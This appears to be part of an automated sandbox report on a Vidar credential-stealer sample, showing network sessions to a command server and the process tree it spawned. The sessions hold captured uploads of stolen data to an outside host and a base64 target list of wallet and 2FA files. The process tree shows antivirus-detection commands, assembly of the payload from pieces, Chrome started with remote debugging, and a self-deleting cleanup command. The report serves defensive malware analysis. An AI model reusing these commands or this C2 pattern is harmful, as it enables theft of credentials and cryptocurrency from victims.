2024-12-22 21:48:16 UTC | 2228 | IN | Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 49821 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:17 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KN7Y5FUK6F37YU3OPHVS
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:17 UTC | 331 | OUT | Data Ascii: ------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------KN7Y5FUK6F37YU3OPHVSContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------KN7Y5FUK6F37YU3OPHVSCont
2024-12-22 21:48:18 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:18 UTC | 1524 | IN | Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 49829 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:20 UTC | 322 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JE3OPZM79H47QI589ZCB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: toptek.sbs
Content-Length: 453
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-22 21:48:20 UTC | 453 | OUT | Data Ascii: ------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------JE3OPZM79H47QI589ZCBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------JE3OPZM79H47QI589ZCBCont
2024-12-22 21:48:20 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sun, 22 Dec 2024 21:48:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-22 21:48:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 49835 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:23 UTC | 325 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----Q1NGDT0R9H4EU37QIMYM
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 131413
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:23 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 51 31 4e 47 44 54 30 52 39 48 34 45 55 33 37 51 49 4d 59 4d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------Q1NGDT0R9H4EU37QIMYMContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------Q1NGDT0R9H4EU37QIMYMCont
2024-12-22 21:48:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:24 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:48:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 49841 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:26 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----26XB16PZUA1VAASJ5PHV
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:26 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 32 36 58 42 31 36 50 5a 55 41 31 56 41 41 53 4a 35 50 48 56 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------26XB16PZUA1VAASJ5PHVContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------26XB16PZUA1VAASJ5PHVCont
2024-12-22 21:48:27 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:27 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:48:27 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.4 | 49852 | 94.130.188.57 | 443 | 7576 | C:\Users\user\AppData\Local\Temp\523266\Relationship.com
Timestamp | Bytes transferred | Direction | Data
2024-12-22 21:48:29 UTC | 322 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----8Q9RQQQQ1DJMYU379R16
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 331
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:48:29 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 38 51 39 52 51 51 51 51 31 44 4a 4d 59 55 33 37 39 52 31 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------8Q9RQQQQ1DJMYU379R16Content-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------8Q9RQQQQ1DJMYU379R16Cont
2024-12-22 21:48:29 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:48:29 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
2024-12-22 21:48:29 UTC 5 IN
Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0



                                                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                                                          Start time:16:46:55
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\GoldenContinent.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\GoldenContinent.exe"
                                                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                                                          File size:1'122'075 bytes
                                                                                                                                                                                                                                                                          MD5 hash:7BC8C8C16081E8D9CEBCCE0D93BC5F8D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                                                                          Start time:16:46:56
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:"C:\Windows\System32\cmd.exe" /c move Jam Jam.cmd & Jam.cmd
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                                                                          Start time:16:46:56
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                                                          Start time:16:46:58
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:4
                                                                                                                                                                                                                                                                          Start time:16:46:58
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /I "opssvc wrsa"
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:5
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:tasklist
                                                                                                                                                                                                                                                                          Imagebase:0xdb0000
                                                                                                                                                                                                                                                                          File size:79'360 bytes
                                                                                                                                                                                                                                                                          MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:6
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c md 523266
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:8
                                                                                                                                                                                                                                                                          Start time:16:46:59
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:findstr /V "landing" Ca
                                                                                                                                                                                                                                                                          Imagebase:0x4d0000
                                                                                                                                                                                                                                                                          File size:29'696 bytes
                                                                                                                                                                                                                                                                          MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:9
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:cmd /c copy /b ..\Existing + ..\Lower + ..\Wants + ..\Elvis + ..\Distribution x
                                                                                                                                                                                                                                                                          Imagebase:0x240000
                                                                                                                                                                                                                                                                          File size:236'544 bytes
                                                                                                                                                                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:10
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:Relationship.com x
                                                                                                                                                                                                                                                                          Imagebase:0xbf0000
                                                                                                                                                                                                                                                                          File size:947'288 bytes
                                                                                                                                                                                                                                                                          MD5 hash:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2598479689.00000000043F1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986763504.00000000018A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2598479689.00000000044CD000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986800119.00000000043FE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000003.1986740506.00000000040F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2594230702.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000A.00000002.2593745021.0000000001864000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                                          Reputation:moderate
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:11
                                                                                                                                                                                                                                                                          Start time:16:47:00
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\choice.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                                                          Commandline:choice /d y /t 5
                                                                                                                                                                                                                                                                          Imagebase:0x380000
                                                                                                                                                                                                                                                                          File size:28'160 bytes
                                                                                                                                                                                                                                                                          MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:15
                                                                                                                                                                                                                                                                          Start time:16:47:45
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                                                          Target ID:17
                                                                                                                                                                                                                                                                          Start time:16:47:46
                                                                                                                                                                                                                                                                          Start date:22/12/2024
                                                                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2520 --field-trial-handle=2344,i,12562058897419694895,3034342051900266821,262144 /prefetch:8
                                                                                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                          Has exited:true

Target ID:19
Start time:16:48:29
Start date:22/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\523266\Relationship.com" & rd /s /q "C:\ProgramData\8Y5XTR16XLN7" & exit
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:20
Start time:16:48:29
Start date:22/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:16:48:29
Start date:22/12/2024
Path:C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):true
Commandline:timeout /t 10
Imagebase:0xdd0000
File size:25'088 bytes
MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true


Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:27
